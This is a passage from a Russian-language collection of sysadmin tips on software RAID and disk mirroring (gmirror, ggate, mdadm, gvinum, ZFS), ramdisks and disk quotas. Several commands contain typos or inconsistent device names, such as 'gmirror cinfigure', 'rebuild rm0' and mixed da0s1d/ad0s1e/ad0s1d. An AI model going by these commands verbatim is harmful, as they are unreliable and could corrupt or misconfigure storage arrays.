подсоединяете его к "зеркалу": # Размечаем диск с учетом того, что количество блоков # у freebsd-zfs должно быть такое же, как и на первом диске. # В даннном примере - 484200428. => 34 488394988 ad0 GPT (233G) 34 256 1 freebsd-boot (128K) 290 4194304 2 freebsd-swap (2.0G) 4194594 484200428 3 freebsd-zfs (231G) => 34 488397101 ad1 GPT (233G) 34 256 1 freebsd-boot (128K) 290 4196417 2 freebsd-swap (2.0G) 4196707 484200428 3 freebsd-zfs (231G) # подсоединяете его к pool'у как элемент зеркала # (не перепутайте с *add*) zpool attach h ad0p3 ad1p3 # смотрим на результат zpool status pool: h state: ONLINE scrub: none requested config: NAME STATE READ WRITE CKSUM h ONLINE 0 0 0 mirror ONLINE 0 0 0 ad0p3 ONLINE 0 0 0 ad1p3 ONLINE 0 0 0 errors: No known data errors Примечание: Тест проводился на 14 версии и с использованием вот этого патча - http://pastebin.com/f3d2089f3 [1] пример migrate.rsync: exclude .ccache exclude /h exclude /dev exclude /nfs exclude /tmp exclude /var/emtpy exclude /var/run Стоит не забыть потом создать эти директории в /h с соответствующими правами на них. В частности без /dev система не загрузится.

Зеркалирование дисков по сети, между двумя FreeBSD серверами (аналог DRBD) (доп. ссылка 1) (доп. ссылка 2) [комментарии]

Функциональности DRBD во FreeBSD можно добиться примонтировав блочное устройство по сети при помощи GEOM Gate (ggate) и добавив его в зеркало с локальным диском средствами gmirror. Для увеличения производительности две машины желательно соединить напрямую через отдельные гигабитные Ethernet порты. Размер зеркалируемых дисковых разделов должен быть минимально возможным для решаемой задачи, так как для последующего перестроения зеркала большого размера может понадобиться слишком много времени. Например, 20Гб раздел будет синхронизирован при 100Мбит линке за 30 минут, а 500Гб - за 11 часов. Имеем два узла: master - машина на которой выполняется работа, slave - запасная машина, которая в случае краха мастера перехватит инициативу. Организуем процесс зеркалирования: разделы /dev/da0s1d на обоих машинах будут использованы в качестве вешнего диска, а /dev/ad0s1e - в качестве локального. Включаем на обоих машинах поддержку GEOM модулей geom_mirror и geom_gate. Прописываем в /boot/loader.conf: geom_mirror_load="YES" geom_gate_load="YES" Перезагружаем системы или загружаем модули руками, если то позволяет текущий securelevel: kldload geom_mirror kldload geom_gate Предположим, что обе машины имеют два сетевых интерфейса: fxp0 - для взаимодействия с внешним миром (мастер узел имеет IP 172.16.100.1, а slave - 172.16.100.2). fxp1 - для зеркалирования дисков между узлами (master - 192.168.100.1, slave - 192.168.100.2). На fxp0 мастера также поднят через алиас 172.16.100.12, который будет использоваться для предоставления публичных сервисов и в случа краха мастера будет перехвачен на slave узле. Для переключения на slave в случае сбоя будем использовать freevrrpd, установленный из порта /usr/ports/net/freevrrpd Пример конфигурации freevrrpd: Мастер узел: [VRID] serverid = 1 interface = fxp0 priority = 255 # повышенный приоритет для master addr = 172.16.100.12/32 # рабочий IP, обрабатывающий запросы внешнего мира. password = anyoneulike masterscript = /usr/local/bin/become_master backupscript = /usr/local/bin/become_standby Резервный узел, который перехватит инициативу в случае краха мастера: [VRID] serverid = 1 interface = fxp0 priority = 240 # пониженный приоритет, поднимать сервер только в случае краха мастера addr = 172.16.100.12/32 # какой IP поднимать в случае краха мастера password = anyoneulike masterscript = /usr/local/bin/become_master backupscript = /usr/local/bin/become_standby Экспорт дисковых разделов. На мастер узле прописываем параметры экспортируемого со slave диска в /etc/gg.exports: 192.168.0.2 RW /dev/da0s1d А на slave-е параметры диска на мастр-узле (в случае краха мастера, slave возмет на себя роль мастера): 192.168.0.1 RW /dev/da0s1d На запасной машине запускаем процесс ggated (только на slave, не на мастере !). ggated -v Демон будет запущен в режиме отладки. После того как все заработает нужно прописать запуск ggated в стартовый скрипт слейва. Импортирование удаленного блочного устройства на мастер-узле осуществляется командой: ggatec create 192.168.100.2 /dev/da0s1d которая вернет имя нового устройства, как правило это будет ggate0 В дальнейшем на мастере нужно осуществлять дисковые операции с /dev/ggate0 Запускаем ggatec только на мастере ! При сбое мастера freevrrpd скрипт become_master завершит выполнение ggated на slave узле и выполнит ggatec, а после восстановления старого мастера поднимет на нем ggated через скрипт become_standby Настройка заркалирования. На мастер-узле создаем RAID-1 из локального и удаленного дисков: gmirror label -v -n -b prefer gm0 /dev/ggate0 gmirror insert -p 100 gm0 /dev/ad0s1e Алгоритм балансировки "prefer" важен для минимизации нагрузки на вторичный диск, все операции чтения будут производится с локального диска, которому выставлен более высокий приоритет 100. Перестраиваем массив: gmirror rebuild rm0 ggate0 Для включения опции автосинхронизации слайсов выполняем: gmirror configure -a gm0 После завершения синхронизации массива в логе увидим: GEOM_MIRROR: Device gm0: rebuilding provider ggate0 finished. GEOM_MIRROR: Device gm0: provider ggate0 activated. Далее /dev/gm0 можно отформатировать стандартным образом через newfs и примонтировать на мастер сервере. Переключение на резевный (slave) сервер в случае краха основного сервера. Проведем эксперимент - отключим линк у мастер-сервера, симулировав его крах. Ниже описана логика работы скрипта become_master На slave завершим ggated процесс. Зеркало должно автоматически заработать на запасном узле: GEOM_MIRROR: Device gm0 created (id=2381431211). GEOM_MIRROR: Device gm0: provider ad0s1e detected. GEOM_MIRROR: Force device gm0 start due to timeout. GEOM_MIRROR: Device gm0: provider ad0s1e activated. GEOM_MIRROR: Device gm0: provider mirror/gm0 launched. Далее выпоним fsck на случай нарушения целостности ФС и примонтируем раздел: fsck -t ufs /dev/mirror/gm0 mount /dev/mirror/gm0 /mnt После того как раздел заработал на slave-сервере, попытаемся восстановить работу мастера, который должен после краза занять роль запасной машины. После включения мастер-узла, займемся восстановления его статуса первичного узла. На местере останавливаем работу зеркала gmirror для перевода его в подчиненный режим. gmirror stop gm0 Запускаем ggated для приема репликаций от бывшего слейва, теперь ставшего основным сервером ggated -v Подключаем локальный диск /dev/da0s1e в зеркало в качестве неприоритетного раздела. Для этого выполняем автоконфигурацию: gmirror configure -n gm0 Оформляем экспорт локального диска /dev/da0s1e: ggatec create 192.168.100.2 /dev/da0s1e И ставим экспортируемому диску наименьший приоритет. gmirror insert -p 0 gm0 /dev/ggate Включаем автоконфигурацию зеркала: gmirror cinfigure -a gm0 Перестраиваем зеркало: gmirror rebuild gm0 ggate0 После завершения перестроения в логе наблюдаем: GEOM_MIRROR: Device gm0: rebuilding provider ggate0 finished. GEOM_MIRROR: Device gm0: provider ggate0 activated. Удаляем раздел /dev/ad0s1d из зеркала и вновь добавляем его с повышенным приоритетом, для восстановления функций основного сервера: gmirror remove gm0 /dev/ad0s1d gmirror insert -p 100 gm0 /dev/ad0s1d Ситуация краха запасного сервера, при работающей мастере. После восстановления работы слейва, на мастер хосте временно отключаем импорт диска: ggatec destroy -f -u 0 в логе GEOM_GATE: Device ggate0 destroyed. GEOM_MIRROR: Device gm0: provider ggate0 disconnected. На слейв узде останавливаем зеркалирование: gmirror stop gm0 Запускаем на слейве экспорт ggated ggated -v На мастер узле подключаем удаленный диск: ggatec create 192.168.100.2 /dev/da0s1e На мастере автоматически должен быть обнаружен подключенный внешний диск: GEOM_MIRROR: Device gm0: provider ggate0 detected. GEOM_MIRROR: Device gm0: provider ggate0 activated. Запускаем перестроение raid и ждем его завершения: gmirror rebuild gm0 ggate0 Замечания по поводу сохранения целостности данных: - нельзя экспортировать через ggated физические разделы, если они уже добавлены в зеркало; - не нужно предпринимать попытки создания мастер-мастер репликации, это невозможно; - нельзя монтировать экспортируемый раздел на активном слейв сервере. Монтирование экспортируемого раздела слейва возможно только на мастер-узле; - После сбоя необходимо выполнить fsck для зеркала; - Обязательно ведение резервного копирования зеркала.

Добавление дополнительного диска в программный RAID5 в Linux [комментарии]

Имеем 3 диска: /dev/sda,/dev/sdb, /dev/sdc Создаем RAID5: mdadm --create /dev/md0 --chunk=64 --level=5 --raid-devices=3 /dev/sda1 /dev/sdb1 /dev/sdc1 Со временем докупили еще диск и решили использовать его как запасной, который автоматически включается в работу при сбое одного из дисков. Подключаем /dev/sdd1, как "spare": mdadm --manage /dev/md0 --add /dev/sdd1 Позже места в RAID5 стало нехватать и мы решили включить spare диск в состав RAID5. Перестраиваем массив: mdadm --grow /dev/md0 --raid-devices=4 Через несколько часов, когда операция будет завершена (следим через /proc/mdstat), расширяем файловую систему: fsck.ext3 /dev/md0 resize2fs /dev/md0

Создание программного RAID10 в Linux (доп. ссылка 1) [комментарии]

Имеет 4 диска: /dev/sd[abcd], на каждом из которых создано по одному разделу. Хотим получить RAID10, как комбинацию из двух raid1, объединенных в raid0 (striping). Создаем два RAID1, /dev/md0 и /dev/md1 mdadm --create /dev/md0 --level=1 --raid-devices=2 /dev/sda1 /dev/sdb1 mdadm --create /dev/md1 --level=1 --raid-devices=2 /dev/sdc1 /dev/sdd1 Объединяем их в RAID10 (1+0): mdadm --create /dev/md2 --chunk=64 --level=0 --raid-devices=2 /dev/md0 /dev/md1 Тоже самое можно проделать одной командой mdadm --create /dev/md0 --level=10 --raid-devices=4 /dev/sda1 /dev/sdb1 /dev/sdc1 /dev/sdd1 Смотрим, что получилось в итоге: mdadm --detail /dev/md2 cat /proc/mdstat

Как заменить сбойный диск в программном RAID1 в Linux (доп. ссылка 1) Автор: howtoforge.com [комментарии]

Программный RAID1 /dev/md0 включает в себя разделы /dev/sda1 и /dev/sdb1. Задача заменить диск /dev/sdb. Диагностику смотрим через (если вместо [UU] видим [U_], то целостность одного из дисков нарушена): cat /proc/mdstat Помечаем раздел как сбойный: mdadm --manage /dev/md0 --fail /dev/sdb1 Отключаем раздел (удаляем из RAID1) mdadm --manage /dev/md0 --remove /dev/sdb1 Выключаем машину, меняем диск. Создаем через fdisk идентичные разделы, или копируем структуру первого диска /dev/sda: sfdisk -d /dev/sda | sfdisk /dev/sdb Добавляем раздел в RAID1 массив: mdadm --manage /dev/md0 --add /dev/sdb1

Создание программного RAID1 под FreeBSD c использованием gmirror (доп. ссылка 1) Автор: zulustips.com [комментарии]

Имеем два диска /dev/ad4 и /dev/ad6, на /dev/ad4 установлена рабочая система. Создаем RAID1 /dev/mirror/gm0 и подключаем к нему диск /dev/ad4 (текущий): gmirror label -v -b round-robin gm0 /dev/ad4 В случае появления ошибки "Can't store metadata on /dev/ad4: Operation not permitted" делаем: sysctl kern.geom.debugflags=16 Включаем загрузку модуля ядра geom_mirror.ko: echo geom_mirror_load=YES >> /boot/loader.conf В /etc/fstab меняем /dev/ad4 на /dev/mirror/gm0 Перезагружаемся и проверяем все ли нормально. Подключаем в RAID1 второй диск: gmirror insert gm0 /dev/ad6 В логе /var/log/messages должно появиться: GEOM_MIRROR: Device gm0: provider ad6 detected. GEOM_MIRROR: Device gm0: rebuilding provider ad6. Дожидаемся окончания перестроения RAID, периодически запуская: gmirror status или gmirror list После завершения перестроения, скорость чтения должна возрасти почти в два раза. В случае выхода из строя диска /dev/ad6, вставляем новый и делаем: gmirror forget gm0 gmirror insert gm0 /dev/ad6

Добавление программного RAID 1 раздела на Linux сервер. (доп. ссылка 1) Автор: sweta [комментарии]

Имеем два дополнительных диска: /dev/hdb (/dev/hdb1 - 40 GB) /dev/hdc (/dev/hdc1 - 40 GB) Создаем RAID 1: mdadm --create /dev/md0 --level=1 --raid-devices=2 /dev/hdb1 /dev/hdc1 Смотрим статус: cat /proc/mdstat Создаем файловую систему на RAID разделе: mkfs.ext3 /dev/md0 Настраиваем монтирование при загрузке (в /etc/fstab): /dev/md0 /data2 ext3 defaults 0 0

Создание atacontrol RAID1 под FreeBSD на живой системе (доп. ссылка 1) Автор: good_loki [комментарии]

При создании RAID1 например: # atacontrol create RAID1 ad0 ad2 система создает raid массив но на него пока ничего не пишеться. Но статус у него READY: # atacontrol status ar0 ar0: ATA RAID1 subdisks: ad4 ad6 status: READY Система считает что после создания raid, на нем создадут слайсы, и партиции, после чего на них запишут данные.(что и происходит при установке системы на ar0) при этом все данные не будут нарушать целостность raid. Но систему можно обмануть. # atacontrol list ATA channel 0: Master: ad0 <ST380011A/3.06> ATA/ATAPI revision 6 //живая система Slave: no device present ATA channel 1: Master: ad2 <ST380011A/3.06> ATA/ATAPI revision 6 //новый диск Slave: no device present # atacontrol detach 1 Теперь мы имеем целостный RAID1 состоящий из одного диска с системой. # atacontrol status ar0 ar0: ATA RAID1 subdisks: ad0 DOWN status: DEGRADED Прописываем ar0 в fstab # Device Mountpoint FStype Options Dump Pass# /dev/ar0s1b none swap sw 0 0 /dev/ar0s1a / ufs rw 1 1 /dev/ar0s1e /tmp ufs rw 2 2 /dev/ar0s1f /usr ufs rw 2 2 /dev/ar0s1d /var ufs rw 2 2 перегружаем систему (!!!должна нормально смонтировать все файловые системы, внимательно смотрите лог загрузки) после перезагрузки: # atacontrol status ar0 ar0: ATA RAID1 subdisks: ad0 DOWN status: DEGRADED # atacontrol addspare ar0 ad2 # atacontrol rebuild ar0 # atacontrol status ar0 ar0: ATA RAID1 subdisks: ad0 ad1 status: REBUILDING 1% completed После окончания rebuild система готова к использованию.

Как перенеси существующую Linux систему на RAID1 добавив второй диск (доп. ссылка 1) Автор: philcore [комментарии]

/dev/sda - диск с установленной ОС /dev/sdb - новый диск для зеркала Клонируем информацию о разделах на новый диск: sfdisk -d /dev/sda | sfdisk /dev/sdb Создаем RAID1, но первый диск пока не трогаем, пометив его отсутствующим: mdadm --create /dev/md0 --level 1 --raid-devices=2 missing /dev/sdb1 mdadm --create /dev/md1 --level 1 --raid-devices=2 missing /dev/sdb2 и т.д. для всех существующих разделов. Создаем ФС: mkfs.ext3 /dev/md0 mkfs.ext3 /dev/md1 ... Монтируем и копируем данные в RAID: mount /dev/md0 /mnt cp -dpRx / /mnt mount /dev/md1 /mnt/var cp -dpRx /var /mnt ... Меняем устройство для загрузки, для Grub в /mnt/boot/grub/menu.lst: title Custom Kernel 2.6.11.7 root (hd0,0) kernel /boot/vmlinuz-2.6.11.7 root=/dev/md0 md=0,/dev/sda1,/dev/sdb1 ro boot title Custom Kernel 2.6.11.7 (RAID Recovery) root (hd1,0) kernel /boot/vmlinuz-2.6.11.7 root=/dev/md0 md=0,/dev/sdb1 ro boot Устанавливаем Grub на второй диск: grub-install /dev/sda Если при установке выдается ошибка: /dev/sda does not have any corresponding BIOS drive. Нужно выполнить grub-install --recheck /dev/sda Или установить вручную: grub grub: device (hd0) /dev/sdb grub: root (hd0,0) grub: setup (hd0) grub: quit cp -dp /mnt/etc/fstab /etc/fstab cp -dp /mnt/boot/grub/menu.lst /boot/grub Перезагружаемся (второй диск) и проверяем все ли работает, если да - подключаем старый диск в RAID: mdadm --add /dev/md0 /dev/sda1 mdadm --add /dev/md1 /dev/sda2 ... cat /proc/mdstat

Мониторинг и восстановление программного RAID в Linux Автор: radigor [комментарии]

Управление программными RAID1-массивами в RHEL Мониторинг состояния Информация о всех RAID-массивах: # more /proc/mdstat или # cat /proc/mdstat или # watch -n .1 cat /proc/mdstat Информация о конкретном дисковом разделе: # mdadm -E /dev/sd<a-b><1-10> например: # mdadm -E /dev/sdb2 Восстановление функционирования Восстановление функционирования (rebuild) разделов диска по одному после однократного "несмертельного" сбоя: # mdadm -a /dev/md<0-6> /dev/sd<a-b><1-10> например: # mdadm -a /dev/md0 /dev/sdb1 Нужно быть аккуратным с номерами разделов В случае ошибки, удалить компонент из RAID командой: # mdadm -r /dev/md0 /dev/sdb1 получается не всегда - устройство может быть занято. Замена диска 1. Выключить компьютер и заменить диск 2. Включить компьютер и определить имеющиеся на обоих дисках разделы: # fdisk /dev/sd<a-b> -l 3. С помощью fdisk создать на новом диске разделы, идентичные оригиналу Необходимо пометить нужный раздел нового диска (sda1 или sdb1) как загрузочный до включения в зеркало. Swap-разделы не подлежат зеркалированию в программном RAID 4. Выполнить Мониторинг состояния и Восстановление функционирования Настройка оповещения Мониторинг выполняется с помощью crond ежечасно. В папку /etc/cron.haurly помещен файл mdRAIDmon, содержащий команду: # mdadm --monitor --scan -1 --mail=postmaster@domain.name.ru Для проверки рассылки сообщения добавляется ключ --test: # mdadm --monitor --scan -1 --mail=postmaster@domain.name.ru --test Помещая файл задания в папку, необходимо установить права доступа на выполнение Если нужно чаще, самое простое, добавьте в /etc/crontab строку, используя нотацию с "/", например: */5 * * * * root run-parts /etc/cron.my5min Конечно, можно попробовать и другие варианты планирования заданий с atd или batch. Создайте папку /etc/cron.my5min и поместите туда файл mdRAIDmon C имитацией отказа диска мне было проще - сервер SR1425BK1 - с корзиной HotSwap

Кратко о текущих методах программного зеркалирования под FreeBSD [обсудить]

CCD (Concatenated Disk Driver) - поддерживает RAID-0 (Striping) и RAID-1 (Mirroring), под FreeBSD 5 подогнана под работу через GEOM, но возможностей меньше чем в GEOM gmirror. При сбое одного из дисков, для продолжения работы нужно восстановить утраченный диск;
Vinum - очень богатые возможности, но сложен и непрозрачен в настройке, под FreeBSD 5 работает нестабильно. При сбое диска, система продолжит работу;
GEOM Vinum - порт Vinum для работы через GEOM, еще не достаточно отлажен и документирован;
GEOM Mirror - специальный GEOM класс для создания RAID-1 зеркал, прост и понятен в настройке, в FreeBSD 5.3 говорят о хорошей стабильности. Поддерживает зеркалирования как дисков в целом, так и отдельных разделов. Доступно несколько режимов балансировки нагрузки на диски в мирроре (round-robin, использование менее загруженного диска и т.д.). После сбоя система продолжает работу, имеется функция автосинхронизации на новый пустой диск.

Настройка программного RAID5 во FreeBSD Автор: McSeem [комментарии]

Понадобилось организовать надежное хранение большого объёма данных. По сей день использовалось софтовое зеркало, но существующего объёма уже не хватало и решено было соорудить RAID5 из трёх дисков по терабайту. В моём случае избыточность составит 1/3 против 1/2 (зеркало). Судя по тому, что мне удалось узнать FreeBSD поддерживает организацию RAID5 двумя менеджерами дискового пространства: VINUM и GEOM. Попробуем каждый из них: I. VINUM. Начиная с FreeBSD5 VINUM была переписана для совместимости с архитектурой GEOM, и теперь новая подсистема называется GVINUM, а модуль ядра сменил название с vinum.ko на geom_vinum.ko. Создадим директорию к которой будем монтировать наш RAID5: snap# mkdir /raid5 Теперь создаём конфигурационный файл нашего массива(расположить его можно где угодно): snap# touch /usr/local/gvinum.conf После этого непосредственно конфигурируем наш массив(как я говорил, в моем случае будет 3 диска по терабайту): snap# vi /usr/local/gvinum.conf Пишем в файле следующее: drive raid51 device /dev/ad5 drive raid52 device /dev/ad6 drive raid53 device /dev/ad7 volume raid5 plex org raid5 256k sd len 1t drive raid51 sd len 1t drive raid52 sd len 1t drive raid53 Где: - drive raid51/raid52/raid53 - это просто псевдонимы физических дисков (можно придумать любое). Используются чисто для удобства. С этими псевдонимами мы будем работать во всём файле и поменяв физический диск, нам не придётся менять его название во всём конфигурационном файле, а достаточно лишь изменить в описании. - volume raid5 - это виртуальный диск (можно придумать тоже любое название). Система его будет видеть как 1 физическое устройство, хотя в моем случае это массив из 3х дисков с полезным объёмом равным ~2м терабайтам. Отображаться будет как /dev/gvinum/raid5 (Назовёте volume terminator, отображаться будет /dev/gvinum/terminator). - plex - это набор, который предоставляет полное адресное пространство тома. Нам нобходим набор RAID5, поэтому организуем набор RAID5: org raid5, причем организовываем со страйпом в 256кВ (судя документации это самый оптимальный размер полосы). - sd - это поддиски(SubDisk), VINUM может организовывать массивы не только из отдельных физических дисков, но и используя разделы UNIX. Я же использую 3 отдельных физических устройства, каждый по 1 терабайту, поэтому указываем размер: len 1t. На этом описание конфигурационного файла закончилось. Теперь создаём сам RAID массив: snap# gvinum create /usr/local/gvinum.conf Создаётся устройство /dev/gvinum/raid5. На нём необходимо создать файловую систему. Создаём: snap# newfs /dev/gvinum/raid5 Стандартное ядро FreeBSD(GENERIC) не включает Vinum. Можно пересобрать ядро с поддержкой Vinum, но этого делать не рекомендуют. Обычный способ активации Vinum - загрузка модуля для ядра (kld). Так и поступим, только использовать команду kldload не будем, да и нет необходимости, при первом вызове gvinum проверит наличие поддержки Vinum в ядре и при необходимости загрузит модуль автоматически. Я сделаю так чтобы модуль Vinum был доступен на этапе загрузки, для этого делаем так: snap# echo geom_vinum_load="YES" >> /boot/loader.conf И последний момент, нужно смонтировать наш массив (Точку монтирования мы указываем /raid5, ту, что создали изначально): snap# echo /dev/gvinum/raid5 /raid5 ufs rw 2 2 >> /etc/fstab Перегружаемся и всё должно работать. :( У меня сервер уходит в Fatal trap 12(Kernel panic) и перегружается до бесконечности. Ничего страшного. Выключаем, ждём 5 минут и включаем, если не получится, выключаем, ждём ещё 5 минут и включаем, в конце концов включается всё норм! Называется размечтался... 1t = 1024G, смотрю свой диск... а там всего 953869m... В общем нужно в конфиге уменьшить размер - len! И после этого всё замечательно работает!!! Можно выводить диски из массива и т.д., но как-то долго... проще сбросить конфиг: snap# gvinum resetconfig На что, он нас спрашивает, вы мол в своё уме? подтвердите что вы это делаете осмысленно! И просит ввести текст "NO FUTURE", ну чтож, вводим: Enter text -> NO FUTURE Я поменял в конфиге размеры дисков на: len 953869m После этого, повторяем команды: snap# gvinum create /usr/local/gvinum.conf snap# newfs /dev/gvinum/raid5 Перегружаемся ещё раз...И вуаля!!! Всё работает!!! II. GEOM: Пробуем второй вариант. GEOM RAID5 в FreeBSD не входит, поэтому придётся скачивать с сайта. На сайте видим, что есть 3 версии это: - Компромисс скорости и использования памяти: geom_raid5 - Самая стабильная, но и самая медленная: geom_raid5 TNG - Улучшенная скорость, но и памяти соответственно потребляет больше: geom_raid5 PP Все версии доступны тут: geom_raid5: http://wgboome.homepage.t-online.de./geom_raid5.tbz geom_raid5 TNG: http://wgboome.homepage.t-online.de./geom_raid5-eff.tbz geom_raid5 PP: http://wgboome.homepage.t-online.de./geom_raid5-pp.tbz Я выбрал "geom_raid5", поэтому переходим в папку с источниками: snap# cd /usr/src И скачиваем архив: snap# wget http://wgboome.homepage.t-online.de./geom_raid5.tbz Архив необходимо распаковать. Действуем: snap# tar -xf geom_raid5.tbz Архив распакован,переходим к процессу инсталляции. Первым делом необходимо собрать модуль. Переходим в папку с конфигом: snap# cd /usr/src/sys/modules/geom/geom_raid5 И запускаем компиляцию: snap# make упс... :( у меня вылезли ошибки...читаем...пробуем исправить... Для этого делаем следующее: snap# cd /usr/src/sys/geom/raid5 И правим в файле g_raid5.c (если у вас ошибки будут такие же как и у меня) кому каким редактором удобнее: 1. Ошибка: в строке 2015 в функции "kthread_exit" много аргументов исправляем: меняем в строке 2015 kthread_exit(0); на kthread_exit(); 2. Ошибка: в строке 2444 в функции "kthread_exit" много аргументов исправляем: меняем в строке 2444 kthread_exit(0); на kthread_exit(); 3. Ошибка: в строке 2635 нету описания функции "kthread_create" исправляем: меняем в строке 2635 kthread_create (остальное не трогаем), на kproc_create 4. Ошибка: в строке 2639 нету описания функции "kthread_create" исправляем: меняем в строке 2639 kthread_create (остальное не трогаем), на kproc_create Примечание: Ошибка 4 другая, и ссылается на строку 2635, но изменив строку 2635 необходимо изменить и 2639, так что делаем так. После того как исправили,снова делаем компиляцию модуля: snap# cd /usr/src/sys/modules/geom/geom_raid5 snap# make Появляется нужный нам файл: "*geom_raid5.ko". Его необходимо скопировать ко всем модулям. Копируем: snap# cp geom_raid5.ko /boot/kernel/geom_raid5.ko Теперь устанавливаем сам geom_raid5: snap# cd /usr/src/sbin/geom/class/raid5 snap# make && make install && make clean Собственно после инсталляции GEOM_RAID5 собираем RAID массив: snap# graid5 label -v -s 256k graid5 /dev/da0 /dev/da1 /dev/da2 И создаём устройство: snap# graid5 load Создаётся устройство /dev/raid5/graid5. На нём необходимо создать файловую систему. Создаём: snap# newfs /dev/raid5/graid5 Создаём точку монтирования: snap# mkdir /graid5 Добавляем запись в /etc/fstab, для автоматического монтирования нашего массива RAID5 при загрузке системы: snap# echo /dev/raid5/graid5 /graid5 ufs rw 2 2 >> /etc/fstab Не забываем добавить загрузку модуля при старте системы: snap# echo 'geom_raid5_load="YES" >> /boot/loader.conf P.S. В конечном итоге остановил свой выбор на GVINUM. В основном из-за того, что он входит в состав FreeBSD, а разработчики, раз решили что GEOM_RAID5 ещё рано(или уже поздно) входить в релиз, то значит так и есть. Протестировал GVINUM на крах (отключением питания и отсоединением шлейфа от одного из дисков в режимах чтение\запись, после этого записывал\удалял данные с битого массива, перегружался, добавлял снова диск, восстанавливал всё работает замечательно! ...но это уже тема для другой статьи...)

Установка Adaptec Storage Manager в Debian Lenny (доп. ссылка 1) Автор: Сергей [комментарии]

К сожалению на официальном сайте нет готовых решений для Adaptec Storage Manager, но поставить было нужно, для этого был скачан rpm пакет для 64 битной версии Rеd Hat, так как Debian также был 64 битный. Ну теперь по порядку: 1. Скачали: asm_linux_x64_v6_40_18530.rpm 2. Создаем директорию: # mkdir asm_linux_x64_v6_40_18530 3. Кладем туда наш пакет: # mv asm_linux_x64_v6_40_18530.rpm asm_linux_x64_v6_40_18530 4. Заходим: # cd asm_linux_x64_v6_40_18530 5. Устанавливаем пакеты: # apt-get install alien fakeroot 6. Пробуем сконвертировать rpm в deb пакет fakeroot alien asm_linux_x64_v6_40_18531.rpm Появляется ошибка: dpkg-gencontrol: error: current build architecture amd64 does not appear in package’s list (i386) 7. Редактируем perl модуль, который использует alien, vi /usr/share/perl5/Alien/Package/Deb.pm и меняем строчку: print OUT "Architecture: ".$this->arch."\n"; на print OUT "Architecture: amd64\n"; Сохраяем и выходим. 8. Теперь перезапускаем: fakeroot alien --scripts asm_linux_x64_v6_40_18530.rpm Появится сообщение о том что все прошло удачно: storman_6.40-18531_amd64.deb generated 9. Создадим новую директорию storman_6.40-18531_amd64 и поддиректорию storman_6.40-18531_amd64/DEBIAN 10. Извлекаем содержимое .deb пакета в созданную директорию # dpkg -x storman_6.40-18531_amd64.deb storman_6.40-18531_amd64 # dpkg --control storman_6.40-18531_amd64.deb storman_6.40-18531_amd64/DEBIAN 11. Уберем специфические для rpm пактов строчки storman_6.40-18531_amd64/DEBIAN/postinst Уберем - chkconfig --add stor_agent и storman_6.40-18531_amd64/DEBIAN/postrm Уберем - chkconfig --del stor_agent 12. Все, теперь можно заново все упаковать в .deb пакет # dpkg -b storman_6.40-18531_amd64/ storman_6.40-18531_amd64_n.deb 13 Установка # dpkg -i storman_6.40-18531_amd64_n.deb 14. Запуск /usr/StorMan/StorMan.sh

Ramdisk, tmpfs

Как под FreeBSD создать файловую систему в памяти (ramdisk) [комментарии]

man mount_mfs mount_mfs -s 614400 /dev/amrd0s1b /usr/obj где /dev/amrd0s1b - swap раздел, 614400 - размер MFS диска N*1024*2 (614400 == 300mb).

Как под Linux создать ramdisk большого размера для использования в качестве временного хранилища. [комментарии]

Советую использовать tmpfs или ramfs (разница в том, что данные tmpfs подвержены своппингу, ramfs создана для тестов, а ramdisk всегда хранится в ОЗУ) /usr/src/linux/Documentation/filesystems/tmpfs.txt mount -t tmpfs -osize=256M /dev/shm1 /mnt1 Для ramfs: mount -t ramfs -omaxsize=256M none /mnt1 Если желание использовать ramdisk осталось, читаем /usr/src/linux/Documentation/ramdisk.txt mkdir /ramdisk Для 256Мб ramdisk в lilo.conf добавляем: append="ramdisk_size=256000" Запускаем lilo и перезагружаем машину. mke2fs /dev/ram0 mount -t -ext2 /dev/ram0 /ramdisk

Диагностика и Восстановление после сбоя

Квоты

MySQL - квотирование баз под FreeBSD Автор: Pahanivo [комментарии]
Хитрости квотирования MySQL.
Каждую базу MySQL хранит в отдельном каталоге внутри datadir. MySQL работает под своим пользователем и соответственно создает файлы баз под им же. Соответственно квотирование в данном случае не возможно. Необходимо заставить его создавать файлы баз, влaдельцем которых будет конкретный квотируемый пользователь. Сделать это можно выставив бит SUID (4000) на каталог базы.
Для начала:
в ядре: options SUIDDIR в /etc/fstab: добавляем в список опций suiddir

В MySQL создаем базу. Находим каталог базы в datadir. По умолчанию он будет mysql:mysql.
Меняем владельца: chown sql-user databasedir теперь наш каталог sql-user:mysql Меняем права: chmod 4070 databasedir

Такая настройка заставит систему создавать файлы от имени владельца каталога (sql-user) причем сам пользователь не будет иметь к нему доступа. К нему будет иметь полный доступ MySQL (от группы mysql).
Теперь мы можем использовать квоты как для обычных файлов. При превышении квот MySQL будет генерить ошибку full disk что является нормальным явлением и корректно отрабатывается MySQL, хотя сопровождается некоторыми проблемами: при запросе на добавление в базу, превысившую квоты, запрос повисает, повисают также последующие запросы, которые можно снять только их убийством или освобождением дополнительного места на диске. При дефолтных настройках это сразу вызовет проблему, так как такие запросы займут все сетевые соединения. Поэтому необходимо ОБЯЗАТЕЛЬНО ограничить максимальное количество подключений одного пользователя MySQL. В /etc/my.cnf:
max_connections = 500 (всего коннектов) max_user_connections = 30 (максимум для одного пользователя)

Также возможно следующие - MySQL может пометить как поврежденные при останове сервера или когда временные файлы займут слишком много места на диске (второе судя по мануалам, не проверял). Лечится репаиром соотвествующих таблиц.
Убить повисшие процессы может только root базы если они достигли max_user_connections.
Не работает с таблицами innodb, так последние хранятся в одном месте независимо от базы.
Коментируйте.

Как включить поддержку ACL в UFS2 FreeBSD 5 (доп. ссылка 1) [комментарии]

В single mode: "/sbin/tunefs -a enable /fs" Пересобираем ядро с "options UFS_ACL" getfacl - просмотр ACL setfacl - установка ACL Например: setfacl -m user:nobody:rw-,group:wheel:rw- acl-test

Установка дисковых квот в FreeBSD (доп. ссылка 1) Автор: Igor [обсудить]

- в конфигурации ядра включаем "options QUOTA" и пересобираем ядро. - в /etc/rc.conf прописываем enable_quotas="YES" и check_quotas="YES" - указываем в fstab файловые системы, для которых будет включаться поддержка квот, например: /dev/da0s1e /home ufs rw,userquota 2 2 /dev/ad0s1h /new_home ufs rw,groupquota 2 2 - устанавливаем квоты для пользователей при помощи edquota, напр. "edquota user1" - если нужно установить одинаковые квоты для нескольких пользователей как у user1: edquota -p user1 user2 user3 user4 user5

Монтирование

Резервное копирование

Резервное копирование с Borg Автор: Александр [комментарии]

